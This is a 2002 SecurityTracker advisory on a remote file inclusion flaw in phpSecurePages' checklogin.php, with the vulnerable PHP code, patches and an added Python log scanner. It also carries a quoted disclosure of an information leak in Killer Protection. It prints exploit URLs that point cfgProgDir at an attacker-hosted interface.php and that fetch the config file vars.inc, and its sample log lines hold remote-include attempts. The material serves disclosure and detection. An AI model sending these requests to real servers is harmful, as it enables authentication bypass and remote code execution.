SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   phpSecurePages
Vendors:   Kruyt, Paul
phpSecurePages Include Error In 'checklogin.php' Lets Remote Users Access The System
SecurityTracker Alert ID:  1005370
SecurityTracker URL:  http://securitytracker.com/id/1005370
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 8 2002
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 0.27b
Description:   A vulnerability was reported in phpSecurePages. A remote user can access the application without authenticating.

It is reported that the 'checklogin.php' script does not properly restrict the '$cfgProgDir' variable, which it uses as the directory prefix when including 'interface.php'. A remote user can specify a remote location for the directory, allowing the remote user to access the application without authenticating.

Some demonstration exploit URLs are provided:

http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php

Additional information is available (in French language) at:

http://www.frog-man.org/tutos/phpSecurePages.txt

Impact:   A remote user can bypass the authentication process and gain access to the application.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following unofficial fix:

Add the following statement at the beginning of checklogin.php:

$cfgProgDir = './';
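
A log check for requests that try to set this variable, as an added example that is not part of the original advisory or of phpSecurePages. It assumes an access log in common log format; the sample lines, client addresses and the host remote.example are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

SCRIPT = "checklogin.php"   # script named in the advisory
PARAM = "cfgProgDir"        # variable named in the advisory (PHP names are case-sensitive)
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample lines in common log format; addresses and host are documentation values.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Oct/2002:10:01:22 +0000] "GET /checklogin.php?cfgProgDir=http://remote.example/ HTTP/1.0" 200 512',
    '198.51.100.7 - - [08/Oct/2002:10:01:40 +0000] "GET /members/checklogin.php?login=1&cfgProgDir=http%3A%2F%2Fremote.example%2F HTTP/1.0" 200 512',
    '203.0.113.9 - - [08/Oct/2002:10:02:03 +0000] "GET /checklogin.php?cfgProgDir=FTP://remote.example/pub/ HTTP/1.0" 200 498',
    '192.0.2.15 - - [08/Oct/2002:10:03:11 +0000] "GET /checklogin.php?cfgProgDir=../ HTTP/1.0" 200 498',
    '192.0.2.44 - - [08/Oct/2002:10:04:00 +0000] "POST /checklogin.php HTTP/1.0" 200 1024',
    '192.0.2.44 - - [08/Oct/2002:10:04:09 +0000] "GET /index.php?page=cfgProgDir HTTP/1.0" 200 2048',
]

def classify(target):
    """Return 'remote', 'override' or None for one logged request target."""
    path, _, query = target.partition("?")
    if not unquote(path).endswith("/" + SCRIPT):
        return None
    verdict = None
    # parse_qsl percent-decodes each value once, so encoded schemes are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != PARAM:
            continue
        if SCHEME.match(value.strip()):
            return "remote"      # include path points at another host
        verdict = "override"     # clients have no reason to set this variable at all
    return verdict

def scan(lines):
    """Return (client, verdict, target) for every request that sets the variable."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if m and (verdict := classify(m.group(3))):
            findings.append((m.group(1), verdict, m.group(3)))
    return findings

if __name__ == "__main__":
    for client, verdict, target in scan(SAMPLE_LOG):
        print(f"{verdict:8} {client:15} {target}")
```

Access logs record only the query string, so a value supplied in a POST body or cookie will not show up in this check.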

Vendor URL:  www.phpSecurePages.f2s.com/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  phpSecurePages & Killer Protection ( PHP )


1)
Information :
Product : phpSecurePages
Tested version : 0.27b
Website : http://www.phpsecurepages.f2s.com
Problem : include file

PHP Code :
-------------- checklogin.php ---------------------
if (!$login) {
	// no login available
	include($cfgProgDir . "interface.php");
	exit;
}
if (!$password) {
	// no password available
	$message = $strNoPassword;
	include($cfgProgDir . "interface.php");
	exit;
}
-------------- checklogin.php ------------------

Exploit :
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/
or
http://[target]/checklogin.php?cfgProgDir=http://[attacker]/&login=1
with
http://[attacker]/interface.php .

Patch :
Add this :
$cfgProgDir =  './';
at the beginning of checklogin.php .

More details in French :
http://www.frog-man.org/tutos/phpSecurePages.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpSecurePages.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




2)
Information :
Product : Killer Protection
Tested version : 1
Website : http://php3scripts.cjb.net
Problem : Information disclosure

Exploit :
http://[target]/vars.inc
and
http://[target]/protection.php?mode=display&username=[LOGIN]&password=[PASSWORD]

Patch :
rename vars.inc >> vars.inc.php .
In protection.php, replace
require("vars2.inc");
by
require("vars2.inc.php");


More details in French :
http://www.frog-man.org/tutos/KillerProtection.txt

translated by Google :
http://translate.google.com/translate?u=http://www.frog-man.org/tutos/KillerProtection.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools




frog-m@n

